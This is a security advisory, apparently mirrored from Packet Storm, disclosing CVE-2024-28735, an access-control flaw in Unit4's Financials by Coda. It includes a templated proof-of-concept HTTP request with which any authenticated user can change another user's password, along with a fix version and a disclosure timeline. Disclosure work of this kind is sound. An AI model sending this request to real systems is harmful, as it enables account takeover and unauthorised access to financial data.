Financials By Coda Authorization Bypass
2024-3-15 22:56:32 Author: packetstormsecurity.com(查看原文) 阅读量:12 收藏

# Vulnerability type: Incorrect Access Control
# Vendor: https://www.unit4.com/
# Product: Financials by Coda
# Product site: https://www.unit4.com/fr/products/financial-management-software
# Affected version: < 2023Q4
# Fixed version: 2023Q4
# Credit: Léo DRAGHI
# CVE: CVE-2024-28735

# PROOF OF CONCEPT
The "Change Password" feature can be abused in order to modify the password of any user of the application.
The only conditions for an attacker are to have the credentials of a valid account (regardless of the profile) and to know the username of the target.

POST /coda/rest/session/password HTTP/2
Host: <target>
<snip>

{
"user" : "<targeted_user>",
"password" : "<attacker_user_password>",
"company" : "<company>",
"newPassword" : "<new_password_for_targeted_user",
"tzOffset" :240
}

# TIMELINE
– 30/10/2023: Vulnerability found
– 02/11/2023: Vendor informed
– 05/12/2023: Vendor fixed the issue
– 14/03/2024: Public disclosure


文章来源: https://packetstormsecurity.com/files/177620/financialsbycoda-bypass.txt
如有侵权请联系:admin#unsafe.sh